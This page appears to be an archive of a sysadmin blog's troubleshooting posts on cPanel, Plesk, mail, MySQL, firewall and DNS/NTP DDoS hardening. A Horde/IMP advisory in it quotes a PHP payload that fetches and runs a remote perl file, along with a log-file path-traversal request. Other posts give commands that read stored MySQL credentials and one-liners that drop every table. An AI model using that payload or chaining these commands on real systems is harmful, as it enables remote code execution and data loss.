Author Archives: Joel T Abraham

Issue with exim — require_files: Permission denied in logs ?

Facing issue in sending/receiving mails in a cPanel server ?

As always, first place is to check for /var/log/exim_mainlog.
If you spot something like this :

2014-04-30 17:07:34 H=(xxxx-122-106-xx-xx-co.in) [xx.xx.xx.xx]:55278 F= temporarily rejected RCPT : require_files: error for /home/account/etc/domain.com: Permission denied

It looks like the permission/ownership has been altered for the path
given in the logs ( the mailbox location )

Fix this issue by running the following :

/scripts/mailperm 'account-name'

— mailperm script is provided by cPanel to automatically fix the permission
and ownership of mailboxes with the user account provided.

Plesk upgrade to the latest stable version — Centos 5.x 64 bit arch

— Plesk can be upgraded upto version 9.5.4 either from Plesk control
Panel or by using the following script :

# /usr/local/psa/admin/bin/autoinstaller

— Till this version, its pretty straightforward.

— But when trying to upgrade to a version higher with a PHP
version < 5.3, you will face issues. -- We are now trying to Upgrade Plesk using the stock CentOS repo's and do not depend on any 3rd Party repo's including the trusted atomic. -- From the version 9.5.4, do an installation again, selecting the same version number (9.5.4) # /usr/local/psa/admin/bin/autoinstaller

# After selecting the version from the installation menu, you will find such a screen in the
next page :

Please select the components of Parallels Plesk Panel you want to install:
………
………

Different PHP interpreter versions
14. (*) PHP5 support
15. ( ) PHP5.3 support

— From this select ’15. ( ) PHP5.3 support’ and proceed with the installation.

— At the end of this installation, you will get Plesk 9.5.4 with PHP 5.3 support,
which means you will have the PHP required to upgrade to the next level,
without any further repo’s

— Although this is the case, when you try to check the PHP version,
you will get something like this :

PHP Warning: PHP Startup: Unable to load dynamic library '/usr/lib64/php/
modules/sqlite.so' - /usr/lib64/php/modules /sqlite.so: cannot open shared
object file: No such file or directory in Unknown on line 0

— Ignore this error for the moment

— Upgrade Plesk to 11.5 using the auto-installer.

— There should not be errors ( in usual cases), other than the license error which can
be ignored.

— Once Upgrade is completed, we will have to fix the issue with sqlite.so.

# yum list php*sqlite*

— This is acutally a bug in Plesk that this module comes with the 32-bit arch, even
if the CentOS arch is 64-bit and all other modules are installed as 64 bit.

— To get around this, remove the rpm ‘php53-sqlite2’ and install a 64-bit arch one
from RHEL/CentOS

— Remove it using the command,

# rpm -e --nodeps php53-sqlite2 ( Dont remove using YUM or without ‘–nodeps’ option )

— Download and install the 64bit arch package

# wget http://plesk-autoinstall.mirror.serverloft.eu/PSA_10.1.1/
dist-rpm-RedHat-el5-x86_64/opt/php53/php53-sqlite2-5.3.2-11011812.x86_64.rpm

— Run the following command to install the Package :

# rpm -i php53-sqlite2-5.3.2-11011812.x86_64.rpm

— Check php -v and ensure things are fine.

cPanel – Chkservd showing Exim/IMAP getting failed numerous times ?

— Check chkservd logs (/var/log/chkservd.log ) and see if we can find something
like this in-relation to exim

==========================

>> AUTH PLAIN AF9fsdsdxcxcxcX19pspdivxc1k1MGJYek44eXpOMVliWkdOdF
dfTVRWbjNPU29uADlBVEFlMG 1MR0hsMVRESlI2WnFIZ3FRSDWWEXQ0dMYUlqZzVEbTFMY
k1FQUpHJokUtTAn:DWQ=

<< 421 host.xxxx.com Service not available - closing connection exim: ** [421 host.xxxx.com: Service not available - closing connection != 2]

==========================

-- This shows that the check daemon failed to authenticate
with the temporal auth key (exim ) and therefore check is getting
failed.

-- As a result of this, we can find lots of SMTP authentication failures
in exim_mainlog ( both from valid and invalid IP's )

-- To fix this issue with exim-auth key, we need to generate them.

-- # cd /var/cpanel/serviceauth/
# rm -rf exim
# service cpanel restart
# service exim restart

Monitor chkservd logs ( /var/log/chkservd.log ) and make sure things are fine !

Error when trying to FTP !

When trying to FTP-in, facing this error ? :

=================

Status: Resolving address of xxxxxxxxxxxxxxx.com
Status: Connecting to xx.xx.xx.xx:21…
Status: Connection established, waiting for welcome message…
Response: 421 Too many connections (x) from this IP
ons (x) from this IP

=================

As the logs indicate, the limit for connections from the IP you are trying
to login has reached its maximum value.

Increase this from the configuration file, the value 'MaxClientsPerIP'
( if its pure-ftp ) or 'MaxClientsPerHost' ( pro-ftpd)
and restart the service.

Alternatively, you can also terminate the existing connections, if they are not in use.
# netstat -plan | grep :21 and kill the corresponding process
( # kill -9 PID )

Error when enabling SMTP Restrictions – cPanel/WHM

SMTP restrictions prevent users from bypassing your mail server to send mail.
This feature allows you to configure your server so that the mail
transport agent (MTA), Mailman mailing list software, and root user
are the only accounts able to connect to remote SMTP servers.

Enable from WHM as :

Home >> Security Center >> SMTP Restrictions

When doing so, do you face this error ?

An error occurred attempting to update this setting.
The SMTP restriction is disabled.

When trying to do it from backend,

# /scripts/smtpmailgidonly on

SMTP Mail protection has been disabled. All users may make smtp connections.
There was a problem setting up iptables. You either have an older kernel or a
broken iptables install, or ipt_owner could not be loaded.

In Most cases, the required iptables module, ‘ipt_owner’ would be disabled.
You can confirm it by running # /etc/csf/csftest.pl

If your’s is a VPS, ask the provider to enable it for you, or if
you manage your server, enable it using the command :

# modprobe ipt_owner

Issue with NTP servers — The new DDoS target !!

Just like the DDoS is hitting web-servers and DNS servers, it has started hitting
the ntpd servers which are left open.

This is a very recent attack. The Network Time Protocol, or NTP, syncs time
between machines on the network, and runs over port 123 UDP. It’s typically
configured once by network administrators and often is not updated.

Recently there is a major jump in attacks via the protocol. Attackers appear to be
employing NTP for DDoSing similar to the way DNS is being abused in such attacks.
They transmit small spoofed packets requesting a large amount of data sent to the
DDoS target’s IP address. It’s all about abusing the so-called “monlist” command
in an older version of NTP. Monlist returns a list of the last 600 hosts that have
connected to the server.

To check if your ntp service is open/vulernable :

# ntpdc -c monlist IP ( See if it returns the list of hosts,
if it does, it is vulnerable )

To get around this,

# The easiest way to update to NTP version 4.2.7, which removes the monlist
command entirely.

# If upgrading is not an option, you can start the NTP daemon with noquery enabled
in the NTP conf file. This will disable access to mode 6 and 7 query
packets (which includes monlist).

Add the below lines to /etc/ntp.conf :

========

restrict default kod nomodify notrap nopeer noquery
restrict -6 default kod nomodify notrap nopeer noquery

========

If monolist query is disabled,

# ntpdc -n -c monlist IP should return,

xx.xx.xx.xx: timed out, nothing received
***Request timed out

The basic issue is that all the ntp servers are left open, meaning any servers
can query them. For eg we have the following part in the config
file of a ntpd server :

============

# — CLIENT NETWORK ——-

============

– under this portion, either nothing would be given ( which means all can access/query )
or the following,

restrict 192.168.1.0 mask 255.255.255.0 notrust nomodify notrap

which means all can still access/query, in particular that range specified cannot do the
above 3 actions.

still this makes them an open ntpd service, which responds to the queries.

If the following was given,

restrict 192.168.1.0 mask 255.255.255.0 notrust noquery nomodify notrap

it implies all systems under the above n/w segment can access, but cannot
query, –similar to the 2 liner which is given irrespective of all n/w segments.

Before you become a part in the chain, take the preventive measures.

Apache error_log – piling up with PHP errors ?

Is error_log associated with a domain piling up in huge size ?

Check the contents of it and see if its something like this :

=============

[07-Feb-2014 00:19:15 America/New_York] PHP Strict Standards: Non-static method JDispatcher::getInstance() should not be called statically in
[07-Feb-2014 00:19:15 America/New_York] PHP Strict Standards: Non-static method JLoader::load() should not be called statically in
[07-Feb-2014 00:19:15 America/New_York] PHP Strict Standards: Non-static method JLoader::register() should not be called statically in
[07-Feb-2014 00:19:15 America/New_York] PHP Strict Standards: Non-static method JPluginHelper::_import() should not be called statically in
[07-Feb-2014 00:19:15 America/New_York] PHP Strict Standards: Non-static method JLoader::import() should not be called statically in

……….
……….

=============

We can see that it is reporting PHP Strict-Standards errors.
As each and every strict standard errors is being reported,
error_log is consuming huge amount of space.

This is a change which has been seen in the newer version of PHP, ( PHP 5.4 )
which now reports E_STRICT errors on default.

To get around this issue, disable error reporting for strict standards,
by adding the below line to PHP configuration file.

error_reporting = E_ALL & ~E_NOTICE & ~E_STRICT

An issue with exim — mails not getting delivered to certain mail-servers

Facing an issue with exim, that it doesn’t send any mails to certain SMTP server’s like gmail etc?

First place to check is the /var/log/exim_mainlog and see if you can spot something like this

=============

-bash-3.2# grep 1W6OuM-0005cl-J8 /var/log/exim_mainlog
2014-01-23 19:21:42 1W6OuM-0005cl-J8 <= root@host.xxxx. U=root P=local S=350 T=”test mail” for test@gmail.com
2014-01-23 19:21:42 cwd=/var/spool/exim 4 args: /usr/sbin/exim -v -Mc 1W6OuM-0005cl-J8
2014-01-23 19:21:42 1W6OuM-0005cl-J8 gmail-smtp-in.l.google.com [xxxx:abcd:xxxx:xab::xa] Network is unreachable
2014-01-23 19:21:43 1W6OuM-0005cl-J8 Completed

============

You can see that exim is trying to send outgoing emails via IPv6 . It happens if the recipient server supports it, ( gmail supports it ) as a result mail delivery gets affected or the mails reach junk/spam folder.

If IPv6 delivery is not intended and DNS records for the same are not configured, then the recipient SMTP server would not be able to obtain a reverse DNS entry of the sending IP ( IP in IPv6 ) and as a result it affects the mail delivery.

To get around this, either configure your IPv6 DNS entries or just force exim to send mails only via IPv4 by adding the below line to the exim config file ( /etc/exim.conf

disable_ipv6 = true

Finally restart exim.

Useful MySQL commands

To find MySQL root/admin pass :

cPanel server           : cat /root/.my.cnf ( username : root )
Plesk server             : cat /etc/psa/.psa.shadow ( username : admin )
DirectAdmin server  : cat /usr/local/directadmin/conf/mysql.conf

To login to MySQL :

mysql -u 'username' -p ( will prompt for password )
Password:

To create MySQL dump of a database :

mysqldump -u 'username' -p dbname > database_name.sql ( will prompt for password )

To create MySQL dump of all databases :

mysqldump -u 'username' -p --all-databases > all_databases.sql ( will prompt for password )

To restore all databases from the MySQL dump :

mysql -u username -p < all_databases.sql ( will prompt for password )

To restore a MySQL dump for a database :

mysql -u 'username' -p dbname < database_name.sql ( will prompt for password )

To restore a single database from dump of all databases :

mysql -u 'username' -p --one-database dbname < all_databases.sql ( will prompt for password )

To create MySQL dump of a single table in a database :

mysqldump -u 'username' -p dbname table_name > table_name.sql ( will prompt for password )

To restore the above table from MySQL dump :

mysql -u 'username' -p dbname < /path/to/table_name.sql ( will prompt for password )

One liner to truncate all tables in a db from MySQL :

mysql -Nse 'show tables' DBNAME | while read table;
do mysql -e "truncate table $table" DBNAME; done

One liner to drop all tables in a db from MySQL :

mysql -Nse 'show tables' DBNAME | while read table;
do mysql -e "drop table $table" DBNAME; done

Protect your server from DDoS attacks – Part 2 !!

We have been talking about DDoS attacks directed at the web-server all this
while  ( http://letushare.com/protect-your-server-from-ddos-attacks )

Another headache would be when these attacks are directed at our DNS services,
which is often called as DNS Amplification Attacks.

In Simple words, the attack can be explained as follows :

Someone makes an enquiry to you, on how to reach a particular destination. You are not actually sure of the location either, so you ask your friends nearer to you, and if you don’t get an answer from them, you are determined to somehow get an answer and you start inquiring
further until you get one. ( Basically you do not know this ‘someone’ who requested your help)

And this ‘someone’ has not stopped there. He has asked this same question to
lots many other people whom like you are determined to get an answer. He would
conclude by saying, if you get an answer, please ring me to 111 – a fake number of
some unknown poor guy.

Similarly, an attacker spoofs IP addresses ( he might spoof it to an IP to which
he would like to carry a DDoS attack – called as the target – like the fake 111 number ) and sends a request to your DNS server asking to resolve a domain. Your DNS server would not have any details about it in your local db’s. So it goes around the internet trying to resolve the domain and as a result the request-queries and the reply-queries increase beyond a limit as the attacker sends more and more request queries.

Now, remember your server might be 1 in 10000 out of which the attacker would direct the reply’s to a target. ( If source IP of the DNS query was spoofed to that of the target’s IP )

So basically, this sort of DDoS attacks, not only affects the ‘target’ but also all the
DNS server’s participating in this attack, as they are flooded with queries ( request and reply )

Attackers will typically submit a request for as much zone information as possible to maximize the amplification effect. In most attacks of this type, the spoofed queries sent by the attacker are of the type, “ANY,” which returns all known information about a DNS zone in a single request. Because the size of the response is considerably larger than the request, the attacker is able to increase the amount of traffic being generated by these DNS services and in the end- the amount of traffic directed at the target would be huge.

So, how can we prevent this from happening ?

Going back to our previous illustration, when that ‘someone’ asked you for a help,
its you who sought to find an answer. You could have said :

“Im sorry, I dont know the route to that destination. Neither do i know you, so i cant spend
my time/energy in assisting you.

This is where you can make your DNS server a closed resolver.

More on this is found at the page, http://letushare.com/169/

And suppose, consider this, your DNS server is closed, still it would receive the
queries from the attacker and your server would have to reply to those DNS queries. Just that
it is not a part of the attack. These replies too might hinder your services if too
much requests are being directed to your server.

Here you can use iptables to set a rate-limit on the queries reaching your DNS port.

First make sure the recent module is loaded in the server
This module is needed to get this particular aspect of iptables working.

First rule is set to move all the packets received in port 53 to a new chain


# iptables -N block ( create a new chain )
# iptables -A INPUT -p udp --dport 53 -j block

Then,

# iptables -A block -m recent --set --name DNSQF --rsource ( creating a db DNSQF to capture the packets )

# iptables -A block -m recent --update --seconds 5 --hitcount 15 --name DNSQF

--rsource -j DROP ( set the rule for the db DNSQF which stores recent IPs )

The above rule implies to drop every packets after the 15th one, in a time-frame of 5 seconds.

Availing these rules in iptables, can in way help to reduce the traffic in your server,
when DNS queries are made to your server, even when it is a closed resolver.

MySQL server not starting ?

There are ton’s of causes for which MySQL might not start,
ranging from disk space full to databases getting corrupt.

First place where you have to check for a clue is the .err log
( /var/lib/mysql/hostname.err )

If the err corresponds to something like this :

InnoDB: End of page dump
140104 12:33:19 InnoDB: Page checksum 2288969011, prior-to-4.0.14-form checksum 2949853821
InnoDB: stored checksum 492713095, prior-to-4.0.14-form stored checksum 2949853821
InnoDB: Page lsn 0 40542, low 4 bytes of lsn at page end 40542
InnoDB: Page number (if stored to page already) 47,
InnoDB: space id (if created with >= MySQL-4.1.1 and stored already) 0
InnoDB: Page may be an update undo log page
InnoDB: Page may be an index page where index id is 12
InnoDB: Also the page in the doublewrite buffer is corrupt.
InnoDB: Cannot continue operation.
InnoDB: You can try to recover the database with the my.cnf
InnoDB: option:
InnoDB: innodb_force_recovery=6

One of the reason for this error is the use of multiple
storage engines, MyISAM or InnoDB

Check your /etc/my.cnf for any lines which highlight the use
of multiple storage engines.

Following can be an example :

innodb_force_recovery=4
default-storage-engine=MyISAM

The above configuration implies MyISAM is the default
storage engine, but another setting related to innoDB is
already given, which conflicts.

If your default storage engine is MyISAM, then
giving the following option in /etc/my.cnf would
help : skip-innodb

Apache error — No space left on device: Couldn’t create accept lock

Apache: [emerg] (28)No space left on device: Couldn’t create accept lock

[notice] suEXEC mechanism enabled (wrapper: /usr/local/apache/bin/suexec)
[crit] (28)No space left on device: mod_rewrite: Parent could not create RewriteLock file /usr/local/apache/logs/rewrite_lock

semget: [emerg] (28) No space left on device OR Apache: No space left on device: Couldn’t create accept lock

You might check if disk space is full and can easily confirm that is not the reason for this error.

The reason behind the error message is Semaphores. You will have to kill the hung/stuck semaphore processes in order

To list the PIDs of the active semaphore processes, execute:

# ipcs -s
—— Semaphore Arrays ——– key
semid owner perms nsems
0×00000000 366673220 apache 600 1
0×00000000 366706589 apache 600 1
0×00000000 366732358 apache 600 1
0×00000000 366734353 apache 600 1

To kill those process, use the command :

# ipcrm -s PID

Once those stuck/hung processes are cleared, restart your apache service.

 

A cPanel bug ( for version — 11.40 ) with clamAV

Getting the following error message ?

===========

Original Message --------
Subject: Cron /usr/local/cpanel/3rdparty/bin/freshclam --quiet --no-warnings
From: (Cron Daemon)
To: root@hostname
Date: 12/12/2013 04:38
> ERROR: Can't create temporary directory

/usr/local/cpanel/3rdparty/share/clamav/clamav-xxxxx.tmp

===========

This is a known issue/bug with cPanel in 11.40

Although the directory ‘/usr/local/cpanel/3rdparty/share/clamav’
has enough permission and ownership configured, it is not able to
create the required files/folders.

A temporary workaround to this issue is to change the ownership of
the directory as shown below :

==========

chown clamav:clamav /usr/local/cpanel/3rdparty/share/clamav

==========

A vulnerability with older versions of Horde/IMP in Plesk !

The Horde/IMP package (3.1.7-3.3.2) that is shipped with Plesk v. 8.x and earlier versions of 9.x (before 9.5.4) has a vulnerability that allows an attacker to run malicious software by passing the login to the webmail with a POST request to the /horde/imp/redirect.php file that includes the PHP code as the username. For example:

<?php passthru("cd /tmp;curl -O -s http://domain.tld/new.txt;

perl new.txt;rm -rf new.txt"); ?>

This results in the PHP code being logged to the /var/log/psa-horde/psa-horde.log file, which, due to a vulnerability in the barcode.php file, allows attackers to cause Horde to execute the code by making this request:

/horde/util/barcode.php?type=../../../../../../../../../../../

var/log/psa-horde/psa-horde.log

Here is what the actual requests the attacker uses and the log entry from the psa-horde.log
file would look like:

xx.xx.xx.xx - - [17/Jan/2012:08:01:19 -0500] "POST /horde/imp/redirect.php

HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5)

Gecko/20091102 Firefox/3.5.5"

xx.xx.xx.xx - - [17/Jan/2012:08:01:35 -0500] " /horde/util/barcode.php?

Resolution

Resolution as suggested by parallels is downloading the patch for Horde and place it in
/usr/share/psa-horde/lib/Horde/

Patch can be obtained from :

http://kb.parallels.com/Attachments/19039/Attachments/patch%20Horde%203.1.7.zip

Open resolvers !!

Open resolver ??

Before getting to know what is an open resolver, you need to know what
is recursion, ie recursive queries !

Suppose you have a DNS server configured and a local machine which uses
your DNS server queries for a website. Imagine this query is a new one 
and its not in the local cache of the machine which made the request.
Once this request reaches your DNS server, it will attempt to find the
website in question in its local cache. If it cannot find an answer it
will query other DNS servers on your behalf until it finds the address.
It will then respond to the original request with the results from each
server’s query.

This scenario is fine, because the local machine which made the initial
request is trusted by you.

What if another machine which isn’t trusted by you, queries your DNS server
for the same ? Then your DNS is an Open resolver.

An open DNS resolver is a name server that provides a recursive name resolution
for non local clients or users. Basically it’s a name server that provides recursive
replies for every system on the internet. Local users or “authorized” clients are
users on networks that you control and/or that you trust. Recursive replies are
the result of following the chain of delegations found in DNS, ending up at the
domain name that was requested by the original user.

Open DNS resolvers are frequently being abused to conduct efficient DDoS attacks towards
websites, infrastructure and services. In a DNS amplification DDoS attack, the attacker
sends a DNS name lookup request to an open DNS resolver with the source address
spoofed to be the victim’s address.

When the DNS server sends the DNS record response, it is sent
to the victim (the source address that was used in the spoofed request). Because the size
of the response is typically considerably larger than the request, the attacker is able to
amplify the volume of traffic directed at the victim. Dont think it would affect just the
victim. Essentially this means that your equipment is taking part in a botnet leveraging
a DDoS attack towards other systems, potentially causing disruption of services and harm.

If your systems take part in such a DDoS attack then your own network, server and services
infrastructure too can easily become congested.

To get around this issue, configure your DNS server to either disable recursion or
allow recursion from trusted set of IPs.

recursion can be disabled by adding the following line to your /etc/named.conf file :

options {

recursion no;

};

You can allow recursion from a trusted set of IPs by giving the following

options {

allow-recursion { 127.0.0.1; IP1; IP2; }; //include your server IPs and
your provider’s nameserver IPs and whichever IPs you feel can be trusted
.
};

Suppose you have a DNS server and you have configured your named as

allow-recursion { IP1;IP2; } ;

Try the following from the machine with IP1,

#nslookup google.com x.x.x.x ( x.x.x.x is the DNS server IP )

The result would be :

———–

(root) nameserver = J.ROOT-SERVERS.NET
(root) nameserver = K.ROOT-SERVERS.NET
(root) nameserver = L.ROOT-SERVERS.NET
(root) nameserver = M.ROOT-SERVERS.NET
(root) nameserver = A.ROOT-SERVERS.NET
(root) nameserver = B.ROOT-SERVERS.NET
(root) nameserver = C.ROOT-SERVERS.NET
(root) nameserver = D.ROOT-SERVERS.NET
(root) nameserver = E.ROOT-SERVERS.NET
(root) nameserver = F.ROOT-SERVERS.NET
(root) nameserver = G.ROOT-SERVERS.NET
(root) nameserver = H.ROOT-SERVERS.NET
(root) nameserver = I.ROOT-SERVERS.NET

…..

———–

Suppose you made the same query from an IP which is not
defined in allow-recursion, then you get the following

———-

Server: x.x.x.x
Address: x.x.x.x#53

** server can’t find google.com: REFUSED

———-

So, consider about tweaking your DNS server, if its an Open resolver !

csf & iptables cheatsheet !!

CSF

csf -a   : allow an ip and add it to /etc/csf.allow
csf -ar  : remove an ip from /etc/csf.allow and delete rule
csf -d   : deny an ip and add to /etc/csf.deny
csf -dr  : unblock an ip and remove from /etc/csf.deny
csf -g   : search the list and give the rule that matches the ip
csf -tr : Remove the IP from temporary ban
csf -x   : disable csf and lfd
csf -e   : enable csf and lfd if disabled
csf -r   : restart csf

CSF config files

  • /etc/csf/csf.conf     :csf config file
  • /etc/csf/csf.allow    :csf allow file
  • /etc/csf/csf.deny     :csf deny file
  • /etc/csf/csf.ignore   :ignore list file ( the ip’s lfd should ignore and not block )
  • /etc/csf/csf.tempban  :to see the ips in temporary ban

To block an entire range of IP’s from a country

Open CSF config file and check for the line  “CC_DENY”  and add the corresponding country code.

For eg, if you want to block the IPs from china, add the country code as ‘CN’

IPTABLES

service iptables status : display the status of firewall
iptables -F :flush out rules
iptables -L -INPUT -n : check the lines of the chain input
iptables -I INPUT -s x.x.x.x -j DROP   : block a single ip address
iptables -D INPUT -s x.x.x.x -j DROP   : delete the ip from the rule
iptables -A INPUT -s x.x.x.x -j ACCEPT : allow all traffic from the ip address
iptables -A INPUT -p tcp --dport 3306 -j DROP : block a port from all ip
iptables -A INPUT -p tcp -s x.x.x.x --dport 3306 -j ACCEPT : allow a port from a single ip
iptables -A INPUT -m mac --mac-source 00:0F:EA:91:04:08 -j DROP :
block traffic from mac address

Diff b/w DROP and REJECT : REJECT works like DROP, but will return an error
message to the host sending the packet that the packet was blocked

iptables-save > /root/rule.file: To save iptables rules to an external file
iptables-restore < /root/rule.file
: To restore the rules back

iptables -L INPUT --line-numbers : To list the rules along with the rule
number in the chain 'INPUT'
iptables -D INPUT 1 : To delete the rule 1 in the chain INPUT

Passive mode FTP !

Enable the passive port range for Pure-FTPd !!

Before that, an overview of different modes for an FTP connection.

File Transfer Protocol (FTP) has 2 modes that you can use for an FTP connection: active and passive. During active mode, the FTP server responds to the connection attempt and returns a connection request from a different port to the FTP client. FTP’s passive mode allows the FTP client to initiate both connection attempts.

Now, to enable passive mode and its range,

* Open the /etc/pure-ftpd.conf configuration file in your preferred text editor.
* Remove the comment (#) from the beginning of the line which contains the PassivePortRange option.
* Change that line to the following:

PassivePortRange 49152 65534 ( indicate the range here )

* Save the changes to the configuration file.
* Run the /usr/local/cpanel/scripts/restartsrv_ftpserver command to restart the server.

Remember to open these ports in firewall.

Options +Includes — what is it ?

What is the option seen as Options +Includes ??

SSI (Server Side Includes) are directives that are placed in HTML pages, and evaluated on the
server while the pages are being served. They let you add dynamically generated content to an existing HTML page, without having to serve the entire page via a CGI program, or other dynamic technology.

The decision of when to use SSI, and when to have your page entirely generated by some program, is usually a matter of how much of the page is static, and how much needs to be recalculated every time the page is served.

SSI is a great way to add small pieces of information, such as the current time.

To permit SSI on your server, you must have the following directive either in your httpd.conf file, or in a .htaccess file:

Options +Includes

Issue with Apache and SymLinks

The vulnerability with Symlinks and Apache is a known issue
in a shared hosting environment.

1st step employed by the attacker in order to carry out this attack it to find a compromised ‘single’ website or domain which has got any vulnerable scripts or 3rd party applications or any themes used in it. Once he get access to a single domain, he moves forward by creating the symlinks to other websites or even he can symlink to / (root).

For eg, if you have the following symlink set in any domain,

link -> /root , using the directory ‘link’ anyone can actually access
/root and can access any sensitive file.

Rather than manually creating this sort of symlinks, the hacker can even use any
perl/cgi script to create a symlink to other users of the server.

As a basic soultion for this, you can ensure that Apache is configured in a
way so as not to following symlinks (Options -FollowSymLinks)

================

To disable the ability for Apache to allow users to follow symbolic links in their requests, remove the FollowSymLinks directive on your Directory commands.

For example, if the below was the configuration then,

<Directory "/usr/local/apache/htdocs">
Options Indexes FollowSymLinks
AllowOverrride None
Order allow,deny
Allow from all

Remove the FollowSymLinks reference so that this reads:

<Directory "/usr/local/apache/htdocs">
Options Indexes
AllowOverrride None
Order allow,deny
Allow from all

================

If you really need symlinks, you can use the “SymLinksIfOwnerMatch” option to only
allow links from within the same user.

To prevent PHP from accessing any file outside of their directory, you need to specify the ‘open_basedir’ setting ( in PHP configuration file ) to only have access to their directory.

This option can be enabled from WHM, but :

==========

This security tweak uses Apache DSO style directives. If PHP is
configured to run as a CGI, SuPHP or
FastCGI process, the open_basedir setting must be manually specified
in the relevant php.ini file.
See the EasyApache documentation for more information.

==========

If the PHP handler is set as CGI or SuPHP, then tweak settings seen in WHM
cannot be used to set the openbase_dir option.

You need to manually specify the openbase_dir option in the global
PHP configuration file ( use php -i |grep php.ini to find the php.ini location )

In addition to prevent this SymLinks attack, there are various patches too :

https://forums.cpanel.net/f185/solutions-handling-symlink-attacks-202242-p4.html#post996441

To be kept in mind is :: the root cause for this attack or vulernablity is due any
unsecured scripts/plugins/applications which might be employed in any of the domains.